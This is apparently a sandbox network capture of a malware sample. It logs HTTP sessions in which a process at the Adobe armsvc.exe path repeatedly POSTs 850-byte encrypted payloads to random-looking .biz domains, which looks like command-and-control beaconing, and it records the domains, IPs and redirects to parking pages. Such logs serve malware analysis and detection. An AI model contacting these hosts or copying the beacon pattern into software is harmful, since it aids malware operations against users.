Dec 16, 2024 14:10:28.069758892 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:10:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3faf5a7318ddd7769676cd494b3c3b9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	18.141.10.107	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:20.958446026 CET	349	OUT	POST /ndknji HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:20.958460093 CET	850	OUT	Data Raw: 3a 6c 30 0a 7e ce ca 3e 46 03 00 00 b6 f4 36 4d 73 0f 57 9e ee 13 26 64 bc 9f ae 54 55 bc 9a fc ba 6f 01 3b 87 fd 9e bd 76 0e fa 7c 3f f8 61 3c 17 68 2e 07 3c 30 6e 89 f4 d3 f0 36 91 58 de 02 42 8d ff 2c f4 85 64 67 5b 51 6c 34 c4 fa 4e 56 b8 5a Data Ascii: :l0~>F6MsW&dTUo;v\|?a<h.<0n6XB,dg[Ql4NVZPa7oWb1G"4/4A\esr(1%=lCc2~ v;l`VucNu;R;bFNA\O>zZ7FF\|DT&QJ]
Dec 16, 2024 14:10:22.965517044 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:10:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d2a54b541ec38eac7929fee22a9f1069\|8.46.123.189\|1734354622\|1734354622\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	54.244.188.177	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:23.685245037 CET	343	OUT	POST /dy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:23.685316086 CET	850	OUT	Data Raw: 66 73 52 94 5c c8 ec 37 46 03 00 00 30 f8 9e 1d 98 5f ad d6 43 36 c2 ea 5b 40 0e 4e 2d 14 cc e5 61 80 7b 3c 49 a9 54 cb d1 ef ee 05 c1 a6 c6 b2 02 ea 6b c6 4a c4 ae 2b 06 56 3f 4c e2 b6 32 d0 bd 29 8d 99 ea 7d 61 a4 a3 a3 56 8f d2 50 81 41 48 e9 Data Ascii: fsR\7F0_C6[@N-a{<ITkJ+V?L2)}aVPAH=^8Qx4mM~{j4xGw+Mcgt"i:utl]z7S8\|gs l}r\| $=RCliA$urgKzZDnu
Dec 16, 2024 14:10:25.037020922 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:10:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=9e017a9da5253b13376eb05e8fb269bb\|8.46.123.189\|1734354624\|1734354624\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	44.221.84.105	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:25.968132973 CET	346	OUT	POST /un HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:25.968163013 CET	850	OUT	Data Raw: ca d5 3e 56 44 49 7a 18 46 03 00 00 17 83 b8 3b 1e de 1c e5 c3 0c 4e e2 b6 05 b6 59 3b 8b 66 b3 9e 07 48 04 0d f4 a9 11 6c 6b 69 6b f6 c2 9e d1 ee 29 f3 94 69 fd e0 d3 f0 0f 70 00 c6 ab ed 81 f4 5a cb d5 d4 1e 22 6a 99 f0 51 5e fa 4f 94 ea db db Data Ascii: >VDIzF;NY;fHlkik)ipZ"jQ^OU3\|%~I'[Tx3B9b}Ik=y",Kx@X6o*'u~bm0rVwPkqrb1t~!?kX7Fk$$l\~7,1{>n\|`<G
Dec 16, 2024 14:10:27.065583944 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:10:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=806a25a6b0c82c2193b2e0338bb13818\|8.46.123.189\|1734354626\|1734354626\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	172.234.222.138	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:28.035669088 CET	347	OUT	POST /vuox HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:28.035669088 CET	850	OUT	Data Raw: 01 ea b5 2e e7 3f e1 72 46 03 00 00 50 67 4a 8d 78 23 6d 34 6e 74 cb 84 89 ee 95 1a 4c 2f 8d 98 f0 81 39 38 2a ab c8 cf f2 fd db e5 f0 21 66 1c 81 52 fe c1 e0 72 6e 14 90 b4 92 f8 02 59 87 c5 e4 52 35 c8 c0 e1 cc ad 31 72 41 17 b6 b3 51 f4 56 8e Data Ascii: .?rFPgJx#m4ntL/98!fRrnYR51rAQVC[K@s3i=GqL(XeGrE5\/?ZdAh41!-%MV@/6emXxdv*"8zryqMU}B
Dec 16, 2024 14:10:28.964426994 CET	466	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Mon, 16 Dec 2024 13:10:28 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.przvgke.biz/vuox Cache-Control: no-store, max-age=0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 16, 2024 14:10:32.995321989 CET	358	OUT	POST /asgidloooxieajf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:32.995398045 CET	850	OUT	Data Raw: 8f 92 c1 fc a9 78 b5 72 46 03 00 00 71 79 72 2a 83 2e 6d e5 55 d6 c9 3b 69 cd 86 ba f1 de 05 99 a8 c6 03 58 a0 d7 0e f5 20 93 e8 fe 32 f6 bd 12 1b dd 75 21 a6 72 93 97 3c 2f f9 47 2c 5c c2 95 bb 8d bb 81 08 dc 59 4c 0d 2a f7 9a 37 a8 11 85 9f 70 Data Ascii: xrFqyr.mU;iX 2u!r</G,\YL7p&s+"muy&qLrg4! ATw{lNupv?`zVKv2;rw)Qv$Uyu:3.IwGv"xS9}
Dec 16, 2024 14:10:33.331868887 CET	477	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Mon, 16 Dec 2024 13:10:33 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.przvgke.biz/asgidloooxieajf Cache-Control: no-store, max-age=0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49738	72.52.179.174	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:29.423388004 CET	330	OUT	GET /vuox HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Dec 16, 2024 14:10:30.593115091 CET	278	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 16 Dec 2024 13:10:30 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/vuox?usid=25&utid=8251791979 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Dec 16, 2024 14:10:33.333394051 CET	341	OUT	GET /asgidloooxieajf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Dec 16, 2024 14:10:33.707448959 CET	289	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 16 Dec 2024 13:10:33 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49739	76.223.26.96	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:31.435611010 CET	354	OUT	GET /vuox?usid=25&utid=8251791979 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Dec 16, 2024 14:10:32.772351027 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Mon, 16 Dec 2024 13:10:32 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QfMB7WLSfaa+uoXVbYkUnV/4yBrwykwOwtPR9cK88Ii+5ganh4g2RmcMPfOcneBoB5FTnXfTz0dTkyAwUJdL1Q== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked
Dec 16, 2024 14:10:32.772660017 CET	1236	IN	Data Raw: 33 64 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 Data Ascii: 3d92<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QfMB7WLSfaa+uoXVbYkUnV/4yBrwykwOwtPR9cK88Ii+5ganh4g2RmcMPfOcneBoB5FTn
Dec 16, 2024 14:10:32.772749901 CET	1236	IN	Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
Dec 16, 2024 14:10:32.772763968 CET	1236	IN	Data Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20 Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
Dec 16, 2024 14:10:32.772882938 CET	1236	IN	Data Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
Dec 16, 2024 14:10:32.772896051 CET	1236	IN	Data Raw: 20 3c 68 31 3e 70 72 7a 76 67 6b 65 2e 62 69 7a 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 48 6f 6c 64 65 72 22 3e 0a 20 20 Data Ascii: <h1>przvgke.biz</h1> </div> <div class="tcHolder"> <div id="tc"></div> </div> </div> </div> <div class="footer"> 2024 Copyright. All Rights Reserved.
Dec 16, 2024 14:10:32.772907972 CET	1236	IN	Data Raw: 20 27 73 65 61 72 63 68 62 6f 78 27 2c 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 53 65 61 72 63 68 49 6e 70 75 74 27 3a 20 31 32 2c 0a 20 20 20 20 20 20 20 20 27 68 69 64 65 53 65 61 72 63 68 49 6e 70 75 74 42 6f 72 64 65 72 27 3a 20 Data Ascii: 'searchbox', 'fontSizeSearchInput': 12, 'hideSearchInputBorder': false, 'hideSearchButtonBorder': true, 'fontSizeSearchButton': 13, 'colorBackground': 'transparent', 'colorSearchButton': '#0b327
Dec 16, 2024 14:10:32.772921085 CET	1236	IN	Data Raw: 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 2b 20 27 26 27 20 3a 20 27 3f 27 29 20 2b 20 27 5f 78 61 66 76 72 3d 4e 7a 46 68 59 57 52 6a 59 54 59 79 4d 57 49 31 4d 7a 4e 6d 59 6a 59 31 59 57 59 33 4f 44 63 77 5a 44 6c 6c 4e 6d 59 78 4f 44 55 78 Data Ascii: ocation.search + '&' : '?') + '_xafvr=NzFhYWRjYTYyMWI1MzNmYjY1YWY3ODcwZDllNmYxODUxYmE5ZDQ4MCw2NzYwMjZjODg2ZmZi'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let pageOptions = {'pubId
Dec 16, 2024 14:10:32.773150921 CET	1236	IN	Data Raw: 61 64 65 64 43 61 6c 6c 62 61 63 6b 54 72 69 67 67 65 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 28 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 Data Ascii: adedCallbackTriggered = true;if ((status.faillisted === true \|\| status.faillisted == "true" \|\| status.blocked === true \|\| status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(
Dec 16, 2024 14:10:32.773164034 CET	1224	IN	Data Raw: 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 Data Ascii: Query(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true \|\| status.adult == "true") && !isAdult) {ajaxQuery(scriptPath + "/track
Dec 16, 2024 14:10:32.893018961 CET	1236	IN	Data Raw: 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 61 6e 73 77 65 Data Ascii: iptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=rejected&uid=" + encodeURIComponent(uniqueTrackingID));}}};let x = function (obj1, obj2) {if (typeof obj1 != "object")obj1 = {};for (let key in obj
Dec 16, 2024 14:10:33.722455025 CET	365	OUT	GET /asgidloooxieajf?usid=25&utid=8251792691 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Dec 16, 2024 14:10:34.206362009 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Mon, 16 Dec 2024 13:10:33 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FO4TwY52o3iOEwg7g/Ed+O6QQ2OtSWH62RBM20VYRJ1aoNURhvcyY36ovhRBH1YQocPzgp9gjtfkPghTjoMMVg== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49741	18.141.10.107	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:35.227845907 CET	353	OUT	POST /sjqomgqqk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:35.227868080 CET	850	OUT	Data Raw: d9 00 0a 1d 3d 03 af 64 46 03 00 00 34 94 46 ab b1 5b f0 27 19 ad ce 80 61 5b 61 a0 c4 16 0f 45 d9 b1 d7 d1 8c 03 6c 29 06 78 46 87 70 86 19 48 fc d2 b1 67 b3 5b 1c 5f 33 ef 36 72 41 1b 01 d2 f6 ee 4f 05 18 9e 89 85 33 82 08 f7 ac 59 cd b0 07 50 Data Ascii: =dF4F['a[aEl)xFpHg[_36rAO3YP4+y\WY?#qECHYn@PBu(DG?H?x5=I6et`fvp ;.WI85fs?WrAMzzrR9`"q{S>b?\=t(
Dec 16, 2024 14:10:37.233135939 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:10:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3c0c32e6a9e1694ae5cdef5c3d650d4f\|8.46.123.189\|1734354636\|1734354636\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	82.112.184.197	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:38.931471109 CET	346	OUT	POST /rdnh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:38.931513071 CET	850	OUT	Data Raw: 61 6c da 0f 62 46 ee 2c 46 03 00 00 12 41 cf bf 5b ce 25 cf 14 18 82 dc 89 59 2a 37 19 51 39 99 d0 87 53 72 e9 fe 0f b0 35 b9 51 7a 58 5c db fc a9 cc b6 4f ae 98 ec 2c 62 e4 9b 0a c1 82 67 fd 1f 0f d2 b2 fc 70 4e 71 e1 10 82 03 50 ba 46 61 40 67 Data Ascii: albF,FA[%Y*7Q9Sr5QzX\O,bgpNqPFa@gZK^2+\|hrHz_ib;1)kPnAv2_av!L(@4;_Oh,~]w,{2B`cO]iZ_4:Y(w%?1O_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	82.112.184.197	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:11:01.203083992 CET	344	OUT	POST /at HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:11:01.203103065 CET	850	OUT	Data Raw: 99 a7 cf 54 fb d3 97 58 46 03 00 00 fd 75 90 a0 46 f6 fa 70 0b 8a de 43 4a cb 01 9a e3 d2 e5 2b d0 c5 74 d6 22 2d 84 d2 e4 23 cb a4 e9 a8 4a 62 f0 13 d4 94 64 86 67 26 e0 a4 3b fb 05 48 63 37 30 da ba 7b ec d3 d4 ea 33 0c f7 3e 14 70 0a 04 fe a6 Data Ascii: TXFuFpCJ+t"-#Jbdg&;Hc70{3>pT]_,,}8vqTFIEujhvHLaH bC/ I!(.]j;q_VC9&0@WDYA8/W*v}y1odp(Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49766	82.112.184.197	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:11:24.516927958 CET	346	OUT	POST /v HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
